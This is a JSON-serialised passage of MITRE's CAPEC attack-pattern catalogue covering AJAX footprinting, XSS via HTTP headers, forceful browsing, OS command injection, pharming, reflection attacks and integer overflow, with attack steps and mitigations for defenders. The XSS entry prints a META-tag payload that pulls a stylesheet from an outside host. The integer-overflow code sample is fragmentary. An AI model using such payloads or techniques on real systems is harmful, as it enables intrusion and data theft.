Related_Weaknesses"}]}},"85":{"ID":"85","Name":"AJAX Footprinting","Abstraction":"Detailed","Status":"Draft","Description":"This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"580"},{"Nature":"CanPrecede","CAPEC_ID":"63"}]},"Execution_Flow":{"Attack_Step":{"Step":"1","Phase":"Explore","Description":"[Send requests to the server and analyze responses] Using a browser or an automated tool, an attacker sends requests to a website and then captures the responses. Responses are analyzed for information on frameworks, architecture, and dependencies.","Technique":["Use a browser to manually request pages and view the responses. Manually parse responses to find information on dependencies and underlying architecture","Use automated scripting to send one or multiple requests to a server and capture any responses. Parse responses from the server to identify any tags that may provide information about dependencies and underlying architecture."]}},"Prerequisites":{"Prerequisite":"The user must allow JavaScript to execute in their browser"},"Skills_Required":{"Skill":["To land and launch a script on victim\'s machine with appropriate footprinting logic for enumerating services and vulnerabilities in JavaScript",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Implementation: Perform input validation for all remote content."]},"Example_Instances":{"Example":"Footprinting can be executed over almost any protocol including HTTP, TCP, UDP, and ICMP, with the general goal of gaining further information about a host environment to launch further attacks. The attacker can probe the system for banners, vulnerabilities, filenames, available services, and in short anything the host process has access to. The results of the probe are either used to execute javascript (for example, if the attackers\' footprint script identifies a vulnerability in a firewall permission, then the client side script executes a javascript to change client firewall settings, or an attacker may simply echo the results of the scan back out to a remote host for targeting future attacks) or to inform other data gathering activities in order to craft atta."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"79"},{"CWE_ID":"113"},{"CWE_ID":"348"},{"CWE_ID":"96"},{"CWE_ID":"20"},{"CWE_ID":"116"},{"CWE_ID":"184"},{"CWE_ID":"86"},{"CWE_ID":"692"}]},"References":{"Reference":{"External_Reference_ID":"REF-539"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Mitigations, Related_Attack_Patterns, Resources_Required, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["AJAX Fingerprinting",{"Date":"2020-12-17"}]}},"86":{"ID":"86","Name":"XSS Through HTTP Headers","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by other actors. XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"588"},{"Nature":"ChildOf","CAPEC_ID":"592"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an attacker follows all public links on a web site. They record all the entry points (input) that becomes part of generated HTTP header (not only GET/POST/COOKIE, but also Content-Type, etc.)","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters used in the HTTP headers.","Look for HTML meta tags that could be injectable","Use a proxy tool to record all links visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":["[Probe identified potential entry points for XSS vulnerability]",{"p":["The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. They record all the responses from the server that include unmodified versions of their script.","The attacker tries also to inject extra-parameter to the HTTP request to see if they are reflected back in the web page or in the HTTP response."]}],"Technique":["Manually inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.","Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.","Use a proxy tool to record results of manual input of XSS probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target software must be a client that allows scripting communication from remote hosts."},"Skills_Required":{"Skill":["To achieve a redirection and use of less trusted source, an attacker can simply edit HTTP Headers that are sent to client machine.",{"Level":"Low"},"Exploiting a client side vulnerability to inject malicious scripts into the browser\'s executable process.",{"Level":"High"}]},"Resources_Required":{"Resource":"The adversary must have the ability to deploy a custom hostile service for access by targeted clients and the abbility to communicate synchronously or asynchronously with client machine. The adversary must also control a remote site of some sort to redirect client and data to."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Design: Utilize strict type, character, and encoding enforcement","Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client\'s browser has no way of discerning where the data is originating from.","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Perform input validation for all remote content.","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser","Implementation: Session tokens for specific host","Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this."]},"Example_Instances":{"Example":[{"p":["Utilize a remote style sheet set in the HTTP header for XSS attack. When the attacker is able to point to a remote stylesheet, any of the variables set in that stylesheet are controllable on the client side by the remote attacker. Like most XSS attacks, results vary depending on browser that is used.","[REF-97]"],"div":["<META HTTP-EQUIV=\\"Link\\" Content=\\"<http://ha.ckers.org/xss.css>; REL=stylesheet\\">",{"style":"margin-left:10px;","class":"attack"}]},{"p":["Google\'s 404 redirection script was found vulnerable to this attack vector.","Google\'s 404 file not found page read","* Response headers: \\"Content-Type: text/html; charset=[encoding]\\".","* Response body: <META http-equiv=\\"Content-Type\\" (...) charset=[encoding]/>","If the response sends an unexpected encoding type such as UTF-7, then no enforcement is done on the payload and arbitrary XSS code will be transported along with the standard HTTP response. [REF-476]"]},"XSS can be used in variety of ways, because it is scripted and executes in a distributed, asynchronous fashion it can create its own vector and openings. For example, the attacker can use XSS to mount a DDoS attack by having series of different computers unknowingly executing requests against a single host."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"80"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-69","Section":"XSS Filter Evasion Cheat Sheet"},{"External_Reference_ID":"REF-476"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Related_Attack_Patterns"}],"Previous_Entry_Name":["Embedding Script (XSS) in HTTP Headers",{"Date":"2017-05-01"}]}},"87":{"ID":"87","Name":"Forceful Browsing","Abstraction":"Standard","Status":"Draft","Description":"An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"115"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.","Technique":["Use a spidering tool to follow and record all links.","Use a proxy tool to record all links visited during a manual traversal of the web application."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt well-known or guessable resource locations] Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.","Technique":["Use a spidering tool to follow and record attempts on well-known URLs.","Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Use unauthorized resources] By visiting the unprotected resource, the attacker makes use of unauthorized functionality.","Technique":"Access unprotected functions and execute them."},{"Step":"4","Phase":"Exploit","Description":"[View unauthorized data] The attacker discovers and views unprotected sensitive data.","Technique":"Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)"}]},"Prerequisites":{"Prerequisite":"The forcibly browseable pages or accessible resources must be discoverable and improperly protected."},"Skills_Required":{"Skill":["Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context.","Forceful browsing can also be made difficult to a large extent by not hard-coding names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context."]},"Example_Instances":{"Example":{"p":["A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.","An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"425"},{"CWE_ID":"285"},{"CWE_ID":"693"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"34","Entry_Name":"Predictable Resource Location"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Forced browsing"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Taxonomy_Mappings"}]}},"88":{"ID":"88","Name":"OS Command Injection","Abstraction":"Standard","Status":"Draft","Description":"In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify inputs for OS commands] The attacker determines user controllable input that gets passed as part of a command to the underlying operating system.","Technique":["Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.","TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey the Application] The attacker surveys the target application, possibly as a valid and authenticated user","Technique":["Spidering web sites for all available links","Inventory all application inputs"]},{"Step":"3","Phase":"Experiment","Description":"[Vary inputs, looking for malicious results.] Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input, containing OS commands, to be passed to the application","Technique":["Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)","Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)"]},{"Step":"4","Phase":"Exploit","Description":"[Execute malicious commands] The attacker may steal information, install a back door access mechanism, elevate privileges or compromise the system in some other way.","Technique":"The attacker executes a command that stores sensitive information into a location where they can retrieve it later (perhaps using a different command injection)."}]},"Prerequisites":{"Prerequisite":"User controllable input used as part of commands to the underlying operating system."},"Skills_Required":{"Skill":["The attacker needs to have knowledge of not only the application to exploit but also the exact nature of commands that pertain to the target operating system. This may involve, though not always, knowledge of specific assembly commands for the platform.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Gain Privileges","Bypass Protection Mechanism"]},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Use language APIs rather than relying on passing data to the operating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable.","Filter all incoming data to escape or remove characters or strings that can be potentially misinterpreted as operating system or shell commands","All application processes should be run with the minimal privileges required. Also, processes must shed privileges as soon as they no longer require them."]},"Example_Instances":{"Example":{"p":["A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line.","An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"78"},{"CWE_ID":"88"},{"CWE_ID":"20"},{"CWE_ID":"697"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"31","Entry_Name":"OS Commanding"}},"References":{"Reference":{"External_Reference_ID":"REF-543"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow, Related_Weaknesses"}]}},"89":{"ID":"89","Name":"Pharming","Abstraction":"Standard","Status":"Draft","Description":"A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to their site rather than the originally intended one. Pharming does not require script injection or clicking on malicious links for the attack to succeed.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"151","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Exploit","Description":"Attacker sets up a system mocking the one trusted by the users. This is usually a website that requires or handles sensitive information."},{"Step":"2","Phase":"Exploit","Description":"The attacker then poisons the resolver for the targeted site. This is achieved by poisoning the DNS server, or the local hosts file, that directs the user to the original website"},{"Step":"3","Phase":"Exploit","Description":"When the victim requests the URL for the site, the poisoned records direct the victim to the attackers\' system rather than the original one."},{"Step":"4","Phase":"Exploit","Description":"Because of the identical nature of the original site and the attacker controlled one, and the fact that the URL is still the original one, the victim trusts the website reached and the attacker can now \\"farm\\" sensitive information such as credentials or account numbers."}]},"Prerequisites":{"Prerequisite":["Vulnerable DNS software or improperly protected hosts file or router that can be poisoned","A website that handles sensitive information but does not use a secure connection and a certificate that is valid is also prone to pharming"]},"Skills_Required":{"Skill":["The attacker needs to be able to poison the resolver - DNS entries or local hosts file or router entry pointing to a trusted DNS server - in order to successfully carry out a pharming attack. Setting up a fake website, identical to the targeted one, does not require special skills.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. Having knowledge of the way the target site has been structured, in order to create a fake version, is required. Poisoning the resolver requires knowledge of a vulnerability that can be exploited."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["All sensitive information must be handled over a secure connection.","Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested.","End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority."]},"Example_Instances":{"Example":{"p":["An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection.","An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"346"},{"CWE_ID":"350"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"90":{"ID":"90","Name":"Reflection Attack in Authentication Protocol","Abstraction":"Standard","Status":"Draft","Description":"An adversary can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the adversary illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An adversary can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"272","Exclude_Related":{"Exclude_ID":"513"}},{"Nature":"ChildOf","CAPEC_ID":"114","Exclude_Related":{"Exclude_ID":"515"}}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify service with vulnerable handshake authentication] The adversary must first identify a vulnerable authentication protocol. The most common indication of an authentication protocol vulnerable to reflection attack is when the client initiates the handshake, rather than the server. This allows the client to get the server to encrypt targeted data using the server\'s pre-shared key."},{"Step":"2","Phase":"Experiment","Description":"[Send challenge to target server] The adversary opens a connection to the target server and sends it a challenge. This challenge is arbitrary and is simply used as a placeholder for the protocol in order to get the server to respond."},{"Step":"3","Phase":"Experiment","Description":"[Receive server challenge] The server responds by returning the challenge sent encrypted with the server\'s pre-shared key, as well as its own challenge to the attacker sent in plaintext. We will call this challenge sent by the server \\"C\\". C is very important and is stored off by the adversary for the next step."},{"Step":"4","Phase":"Experiment","Description":"[Initiate second handshake] Since the adversary does not possess the pre-shared key, they cannot encrypt C from the previous step in order for the server to authenticate them. To get around this, the adversary initiates a second connection to the server while still keeping the first connection alive. In the second connection, the adversary sends C as the initial client challenge, which rather than being arbitary like the first connection, is very intentional."},{"Step":"5","Phase":"Experiment","Description":"[Receive encrypted challenge] The server treats the intial client challenge in connection two as an arbitrary client challenge and responds by encrypting C with the pre-shared key. The server also sends a new challenge. The adversary ignores the server challenge and stores the encrypted version of C. The second connection is either terminated or left to expire by the adversary as it is no longer needed."},{"Step":"6","Phase":"Exploit","Description":"The adversary now posseses the encrypted version of C that is obtained through connection two. The adversary continues the handshake in connection one by responding to the server with the encrypted version of C, verifying that they have access to the pre-shared key (when they actually do not). Because the server uses the same pre-shared key for all authentication it will decrypt C and authenticate the adversary for the first connection, giving the adversary illegitimate access to the target system."}]},"Prerequisites":{"Prerequisite":"The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers\' ability to attack the authentication protocol."},"Skills_Required":{"Skill":["The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges",{"Level":"Medium"}]},"Resources_Required":{"Resource":"All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Gain Privileges","Bypass Protection Mechanism"]},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["The server must initiate the handshake by issuing the challenge. This ensures that the client has to respond before the exchange can move any further","The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client\'s challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.","Introducing a random nonce with each new connection ensures that the attacker cannot employ two connections to attack the authentication protocol"]},"Example_Instances":{"Example":{"p":["A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.","An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"301"},{"CWE_ID":"303"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"92":{"ID":"92","Name":"Forced Integer Overflow","Abstraction":"Detailed","Status":"Draft","Description":"This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"128"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The first step is exploratory meaning the attacker looks for an integer variable that they can control."},{"Step":"2","Phase":"Experiment","Description":"The attacker finds an integer variable that they can write into or manipulate and try to get the value of the integer out of the possible range."},{"Step":"3","Phase":"Exploit","Description":"The integer variable is forced to have a value out of range which set its final value to an unexpected value."},{"Step":"4","Phase":"Exploit","Description":"The target host acts on the data and unexpected behavior may happen."}]},"Prerequisites":{"Prerequisite":["The attacker can manipulate the value of an integer variable utilized by the target host.","The target host does not do proper range checking on the variable before utilizing it.","When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number)"]},"Skills_Required":{"Skill":["An attacker can simply overflow an integer by inserting an out of range value.",{"Level":"Low"},"Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Use a language or compiler that performs automatic bounds checking.","Carefully review the service\'s implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Always do bound checking before consuming user input data."]},"Example_Instances":{"Example":["Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value. See also: CVE-2007-1544",{"p":["The following code illustrates an integer overflow. The declaration of total integer as \\"unsigned short int\\" assumes that the length of the first and second arguments fits in such an integer.","[REF-547], [REF-548]"],"div":["include <stdlib.h>",{"style":"margin-left:10px;","class":"informative","div":["if (argc !=3){",{"style":"margin-left:10px;","div":["printf(\\"Usage: prog_name <string1> <string2>\\\\n\\");",{"style":"margin-left:10px;"}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"190"},{"CWE_ID":"128"},{"CWE_ID":"120"},{"CWE_ID":"122"},{"CWE_ID":"196"},{"CWE_ID":"680"},{"CWE_ID":"697"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"03","Entry_Name":"Integer Overflows"}},"References":{"Reference":[{"External_Reference_ID":"REF-131"},{"External_Reference_ID":"REF-547","Section":"Test Case ID 1511"},{"External_Reference_ID":"REF-548","Section":"Page 152, Figure 5-1"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations, References, Taxonomy_Mappings"}]}},"93":{"ID":"93","Name":"Log Injection-Tampering-Forging","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result 